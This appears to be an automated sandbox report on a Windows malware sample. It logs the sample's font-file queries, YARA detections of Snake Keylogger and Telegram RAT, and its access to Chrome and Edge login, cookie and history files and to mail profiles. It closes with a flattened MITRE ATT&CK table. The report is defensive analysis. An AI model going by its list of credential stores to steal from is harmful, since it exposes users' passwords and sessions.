                    Source: C:\Users\user\Desktop\pbCN4g6sN5.exeQueries volume information: C:\Windows\Fonts\gadugib.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\pbCN4g6sN5.exeQueries volume information: C:\Windows\Fonts\georgia.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\pbCN4g6sN5.exeQueries volume information: C:\Windows\Fonts\georgiai.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\pbCN4g6sN5.exeQueries volume information: C:\Windows\Fonts\georgiab.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\pbCN4g6sN5.exeQueries volume information: C:\Windows\Fonts\georgiaz.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\pbCN4g6sN5.exeQueries volume information: C:\Windows\Fonts\impact.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\pbCN4g6sN5.exeQueries volume information: C:\Windows\Fonts\Inkfree.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\pbCN4g6sN5.exeQueries volume information: C:\Windows\Fonts\javatext.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\pbCN4g6sN5.exeQueries volume information: C:\Windows\Fonts\LeelawUI.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\pbCN4g6sN5.exeQueries volume information: C:\Windows\Fonts\LeelaUIb.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\pbCN4g6sN5.exeQueries volume information: C:\Windows\Fonts\lucon.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\pbCN4g6sN5.exeQueries volume information: C:\Windows\Fonts\l_10646.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\pbCN4g6sN5.exeQueries volume information: C:\Windows\Fonts\malgun.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\pbCN4g6sN5.exeQueries volume information: C:\Windows\Fonts\malgunsl.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\pbCN4g6sN5.exeQueries volume information: C:\Windows\Fonts\malgunbd.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\pbCN4g6sN5.exeQueries volume information: C:\Windows\Fonts\himalaya.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\pbCN4g6sN5.exeQueries volume information: C:\Windows\Fonts\msjh.ttc VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\pbCN4g6sN5.exeQueries volume information: C:\Windows\Fonts\msjhl.ttc VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\pbCN4g6sN5.exeQueries volume information: C:\Windows\Fonts\msjhbd.ttc VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\pbCN4g6sN5.exeQueries volume information: C:\Windows\Fonts\msjh.ttc VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\pbCN4g6sN5.exeQueries volume information: C:\Windows\Fonts\ntailu.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\pbCN4g6sN5.exeQueries volume information: C:\Windows\Fonts\ntailub.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\pbCN4g6sN5.exeQueries volume information: C:\Windows\Fonts\phagspa.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\pbCN4g6sN5.exeQueries volume information: C:\Windows\Fonts\phagspab.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\pbCN4g6sN5.exeQueries volume information: C:\Windows\Fonts\micross.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\pbCN4g6sN5.exeQueries volume information: C:\Windows\Fonts\taile.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\pbCN4g6sN5.exeQueries volume information: C:\Windows\Fonts\taileb.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\pbCN4g6sN5.exeQueries volume information: C:\Windows\Fonts\msyh.ttc VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\pbCN4g6sN5.exeQueries volume information: C:\Windows\Fonts\msyhl.ttc VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\pbCN4g6sN5.exeQueries volume information: C:\Windows\Fonts\msyhbd.ttc VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\pbCN4g6sN5.exeQueries volume information: C:\Windows\Fonts\msyh.ttc VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\pbCN4g6sN5.exeQueries volume information: C:\Windows\Fonts\msyi.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\pbCN4g6sN5.exeQueries volume information: C:\Windows\Fonts\mingliub.ttc VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\pbCN4g6sN5.exeQueries volume information: C:\Windows\Fonts\mingliub.ttc VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\pbCN4g6sN5.exeQueries volume information: C:\Windows\Fonts\mingliub.ttc VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\pbCN4g6sN5.exeQueries volume information: C:\Windows\Fonts\monbaiti.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\pbCN4g6sN5.exeQueries volume information: C:\Windows\Fonts\msgothic.ttc VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\pbCN4g6sN5.exeQueries volume information: C:\Windows\Fonts\msgothic.ttc VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\pbCN4g6sN5.exeQueries volume information: C:\Windows\Fonts\mmrtextb.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\pbCN4g6sN5.exeQueries volume information: C:\Windows\Fonts\Nirmala.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\pbCN4g6sN5.exeQueries volume information: C:\Windows\Fonts\NirmalaS.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\pbCN4g6sN5.exeQueries volume information: C:\Windows\Fonts\NirmalaB.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\pbCN4g6sN5.exeQueries volume information: C:\Windows\Fonts\pala.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\pbCN4g6sN5.exeQueries volume information: C:\Windows\Fonts\palai.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\pbCN4g6sN5.exeQueries volume information: C:\Windows\Fonts\palabi.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\pbCN4g6sN5.exeQueries volume information: C:\Windows\Fonts\segoepr.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\pbCN4g6sN5.exeQueries volume information: C:\Windows\Fonts\segoeprb.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\pbCN4g6sN5.exeQueries volume information: C:\Windows\Fonts\segoesc.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\pbCN4g6sN5.exeQueries volume information: C:\Windows\Fonts\segoescb.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\pbCN4g6sN5.exeQueries volume information: C:\Windows\Fonts\seguihis.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\pbCN4g6sN5.exeQueries volume information: C:\Windows\Fonts\simsun.ttc VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\pbCN4g6sN5.exeQueries volume information: C:\Windows\Fonts\simsunb.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\pbCN4g6sN5.exeQueries volume information: C:\Windows\Fonts\Sitka.ttc VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\pbCN4g6sN5.exeQueries volume information: C:\Windows\Fonts\SitkaI.ttc VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\pbCN4g6sN5.exeQueries volume information: C:\Windows\Fonts\SitkaB.ttc VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\pbCN4g6sN5.exeQueries volume information: C:\Windows\Fonts\SitkaZ.ttc VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\pbCN4g6sN5.exeQueries volume information: C:\Windows\Fonts\Sitka.ttc VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\pbCN4g6sN5.exeQueries volume information: C:\Windows\Fonts\SitkaI.ttc VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\pbCN4g6sN5.exeQueries volume information: C:\Windows\Fonts\SitkaB.ttc VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\pbCN4g6sN5.exeQueries volume information: C:\Windows\Fonts\SitkaZ.ttc VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\pbCN4g6sN5.exeQueries volume information: C:\Windows\Fonts\Sitka.ttc VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\pbCN4g6sN5.exeQueries volume information: C:\Windows\Fonts\SitkaI.ttc VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\pbCN4g6sN5.exeQueries volume information: C:\Windows\Fonts\SitkaB.ttc VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\pbCN4g6sN5.exeQueries volume information: C:\Windows\Fonts\sylfaen.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\pbCN4g6sN5.exeQueries volume information: C:\Windows\Fonts\symbol.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\pbCN4g6sN5.exeQueries volume information: C:\Windows\Fonts\tahoma.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\pbCN4g6sN5.exeQueries volume information: C:\Windows\Fonts\tahomabd.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\pbCN4g6sN5.exeQueries volume information: C:\Windows\Fonts\timesi.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\pbCN4g6sN5.exeQueries volume information: C:\Windows\Fonts\timesbd.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\pbCN4g6sN5.exeQueries volume information: C:\Windows\Fonts\timesbi.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\pbCN4g6sN5.exeQueries volume information: C:\Windows\Fonts\trebuc.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\pbCN4g6sN5.exeQueries volume information: C:\Windows\Fonts\trebucit.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\pbCN4g6sN5.exeQueries volume information: C:\Windows\Fonts\trebucbd.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\pbCN4g6sN5.exeQueries volume information: C:\Windows\Fonts\trebucbi.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\pbCN4g6sN5.exeQueries volume information: C:\Windows\Fonts\verdana.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\pbCN4g6sN5.exeQueries volume information: C:\Windows\Fonts\verdanai.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\pbCN4g6sN5.exeQueries volume information: C:\Windows\Fonts\verdanaz.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\pbCN4g6sN5.exeQueries volume information: C:\Windows\Fonts\webdings.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\pbCN4g6sN5.exeQueries volume information: C:\Windows\Fonts\wingding.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\pbCN4g6sN5.exeQueries volume information: C:\Windows\Fonts\YuGothR.ttc VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\pbCN4g6sN5.exeQueries volume information: C:\Windows\Fonts\YuGothM.ttc VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\pbCN4g6sN5.exeQueries volume information: C:\Windows\Fonts\YuGothL.ttc VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\pbCN4g6sN5.exeQueries volume information: C:\Windows\Fonts\YuGothB.ttc VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\pbCN4g6sN5.exeQueries volume information: C:\Windows\Fonts\YuGothM.ttc VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\pbCN4g6sN5.exeQueries volume information: C:\Windows\Fonts\YuGothR.ttc VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\pbCN4g6sN5.exeQueries volume information: C:\Windows\Fonts\holomdl2.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\pbCN4g6sN5.exeQueries volume information: C:\Windows\Fonts\AGENCYR.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\pbCN4g6sN5.exeQueries volume information: C:\Windows\Fonts\AGENCYB.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\pbCN4g6sN5.exeQueries volume information: C:\Windows\Fonts\ANTQUAI.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\pbCN4g6sN5.exeQueries volume information: C:\Windows\Fonts\ANTQUABI.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\pbCN4g6sN5.exeQueries volume information: C:\Windows\Fonts\ARLRDBD.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\pbCN4g6sN5.exeQueries volume information: C:\Windows\Fonts\BERNHC.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\pbCN4g6sN5.exeQueries volume information: C:\Windows\Fonts\BOD_R.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\pbCN4g6sN5.exeQueries volume information: C:\Windows\Fonts\BOD_CR.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\pbCN4g6sN5.exeQueries volume information: C:\Windows\Fonts\BOD_BLAR.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\pbCN4g6sN5.exeQueries volume information: C:\Windows\Fonts\BOD_CBI.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\pbCN4g6sN5.exeQueries volume information: C:\Windows\Fonts\BOOKOSB.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\pbCN4g6sN5.exeQueries volume information: C:\Windows\Fonts\BRITANIC.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\pbCN4g6sN5.exeQueries volume information: C:\Windows\Fonts\BRLNSDB.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\pbCN4g6sN5.exeQueries volume information: C:\Windows\Fonts\BRLNSB.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\pbCN4g6sN5.exeQueries volume information: C:\Windows\Fonts\CALISTI.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\pbCN4g6sN5.exeQueries volume information: C:\Windows\Fonts\COOPBL.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\pbCN4g6sN5.exeQueries volume information: C:\Windows\Fonts\COPRGTB.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\pbCN4g6sN5.exeQueries volume information: C:\Windows\Fonts\DUBAI-MEDIUM.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\pbCN4g6sN5.exeQueries volume information: C:\Windows\Fonts\GIGI.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\pbCN4g6sN5.exeQueries volume information: C:\Windows\Fonts\GLECB.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\pbCN4g6sN5.exeQueries volume information: C:\Windows\Fonts\GOTHIC.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\pbCN4g6sN5.exeQueries volume information: C:\Windows\Fonts\GOUDYSTO.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\pbCN4g6sN5.exeQueries volume information: C:\Windows\Fonts\ITCBLKAD.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\pbCN4g6sN5.exeQueries volume information: C:\Windows\Fonts\ITCEDSCR.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\pbCN4g6sN5.exeQueries volume information: C:\Windows\Fonts\LCALLIG.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\pbCN4g6sN5.exeQueries volume information: C:\Windows\Fonts\LFAXD.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\pbCN4g6sN5.exeQueries volume information: C:\Windows\Fonts\MATURASC.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\pbCN4g6sN5.exeQueries volume information: C:\Windows\Fonts\MOD20.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\pbCN4g6sN5.exeQueries volume information: C:\Windows\Fonts\PAPYRUS.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\pbCN4g6sN5.exeQueries volume information: C:\Windows\Fonts\PERB____.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\pbCN4g6sN5.exeQueries volume information: C:\Windows\Fonts\RAGE.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\pbCN4g6sN5.exeQueries volume information: C:\Windows\Fonts\RAVIE.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\pbCN4g6sN5.exeQueries volume information: C:\Windows\Fonts\ROCKB.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\pbCN4g6sN5.exeQueries volume information: C:\Windows\Fonts\SNAP____.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\pbCN4g6sN5.exeQueries volume information: C:\Windows\Fonts\STENCIL.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\pbCN4g6sN5.exeQueries volume information: C:\Windows\Fonts\TCCM____.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\pbCN4g6sN5.exeQueries volume information: C:\Windows\Fonts\TCCB____.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\pbCN4g6sN5.exeQueries volume information: C:\Windows\Fonts\WINGDNG2.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\pbCN4g6sN5.exeQueries volume information: C:\Windows\Fonts\OFFSYMXL.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\pbCN4g6sN5.exeQueries volume information: C:\Windows\Fonts\OFFSYMB.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\pbCN4g6sN5.exeQueries volume information: C:\Windows\Fonts\micross.ttf VolumeInformationJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeQueries volume information: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe VolumeInformationJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformationJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformationJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\pbCN4g6sN5.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

                    Stealing of Sensitive Information

                    barindex
                    Yara detected Snake Keylogger
                    Source: Yara matchFile source: 00000005.00000002.2903836633.0000000002DC1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Yara detected Telegram RAT
                    Source: Yara matchFile source: 0.2.pbCN4g6sN5.exe.35df6d0.2.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 5.2.InstallUtil.exe.400000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.pbCN4g6sN5.exe.35df6d0.2.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 00000000.00000002.2382308673.0000000003559000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000005.00000002.2900986537.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000000.00000002.2382308673.00000000035DF000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: Process Memory Space: pbCN4g6sN5.exe PID: 5696, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: InstallUtil.exe PID: 7492, type: MEMORYSTR
                    Yara detected VIP Keylogger
                    Source: Yara matchFile source: 0.2.pbCN4g6sN5.exe.35df6d0.2.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 5.2.InstallUtil.exe.400000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.pbCN4g6sN5.exe.35df6d0.2.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 00000000.00000002.2382308673.0000000003559000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000005.00000002.2900986537.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000000.00000002.2382308673.00000000035DF000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: Process Memory Space: pbCN4g6sN5.exe PID: 5696, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: InstallUtil.exe PID: 7492, type: MEMORYSTR
                    Tries to harvest and steal browser information (history, passwords, etc)
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\HistoryJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\CookiesJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login DataJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\HistoryJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web DataJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Top SitesJump to behavior
                    Tries to steal Mail credentials (via file / registry access)
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile opened: C:\Users\user\AppData\Roaming\PostboxApp\Profiles\Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676Jump to behavior
                    Source: Yara matchFile source: 0.2.pbCN4g6sN5.exe.35df6d0.2.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 5.2.InstallUtil.exe.400000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.pbCN4g6sN5.exe.35df6d0.2.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 00000000.00000002.2382308673.0000000003559000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000005.00000002.2900986537.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000005.00000002.2903836633.0000000002EC7000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000000.00000002.2382308673.00000000035DF000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: Process Memory Space: pbCN4g6sN5.exe PID: 5696, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: InstallUtil.exe PID: 7492, type: MEMORYSTR

                    Remote Access Functionality

                    barindex
                    Yara detected Snake Keylogger
                    Source: Yara matchFile source: 00000005.00000002.2903836633.0000000002DC1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Yara detected Telegram RAT
                    Source: Yara matchFile source: 0.2.pbCN4g6sN5.exe.35df6d0.2.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 5.2.InstallUtil.exe.400000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.pbCN4g6sN5.exe.35df6d0.2.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 00000000.00000002.2382308673.0000000003559000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000005.00000002.2900986537.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000000.00000002.2382308673.00000000035DF000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: Process Memory Space: pbCN4g6sN5.exe PID: 5696, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: InstallUtil.exe PID: 7492, type: MEMORYSTR
                    Yara detected VIP Keylogger
                    Source: Yara matchFile source: 0.2.pbCN4g6sN5.exe.35df6d0.2.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 5.2.InstallUtil.exe.400000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.pbCN4g6sN5.exe.35df6d0.2.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 00000000.00000002.2382308673.0000000003559000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000005.00000002.2900986537.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000000.00000002.2382308673.00000000035DF000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: Process Memory Space: pbCN4g6sN5.exe PID: 5696, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: InstallUtil.exe PID: 7492, type: MEMORYSTR

                    Mitre Att&ck Matrix

                    ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                    Gather Victim Identity InformationAcquire Infrastructure1
                    Valid Accounts                    		1
                    Native API                    		1
                    DLL Side-Loading                    		1
                    DLL Side-Loading                    		1
                    Disable or Modify Tools                    		1
                    OS Credential Dumping                    		13
                    System Information Discovery                    		Remote Services11
                    Archive Collected Data                    		1
                    Web Service                    		Exfiltration Over Other Network MediumAbuse Accessibility Features
                    CredentialsDomainsDefault Accounts1
                    Scheduled Task/Job                    		1
                    Valid Accounts                    		1
                    Valid Accounts                    		1
                    Deobfuscate/Decode Files or Information                    		1
                    Input Capture                    		111
                    Security Software Discovery                    		Remote Desktop Protocol1
                    Data from Local System                    		3
                    Ingress Tool Transfer                    		Exfiltration Over BluetoothNetwork Denial of Service
                    Email AddressesDNS ServerDomain AccountsAt1
                    Scheduled Task/Job                    		1
                    Access Token Manipulation                    		3
                    Obfuscated Files or Information                    		Security Account Manager1
                    Process Discovery                    		SMB/Windows Admin Shares1
                    Screen Capture                    		11
                    Encrypted Channel                    		Automated ExfiltrationData Encrypted for Impact
                    Employee NamesVirtual Private ServerLocal AccountsCronLogin Hook311
                    Process Injection                    		11
                    Software Packing                    		NTDS141
                    Virtualization/Sandbox Evasion                    		Distributed Component Object Model1
                    Email Collection                    		3
                    Non-Application Layer Protocol                    		Traffic DuplicationData Destruction
                    Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon Script1
                    Scheduled Task/Job                    		1
                    DLL Side-Loading                    		LSA Secrets1
                    Application Window Discovery                    		SSH1
                    Input Capture                    		14
                    Application Layer Protocol                    		Scheduled TransferData Encrypted for Impact
                    Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
                    Masquerading                    		Cached Domain Credentials1
                    System Network Configuration Discovery                    		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                    DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items1
                    Valid Accounts                    		DCSyncRemote System DiscoveryWindows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                    Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job1
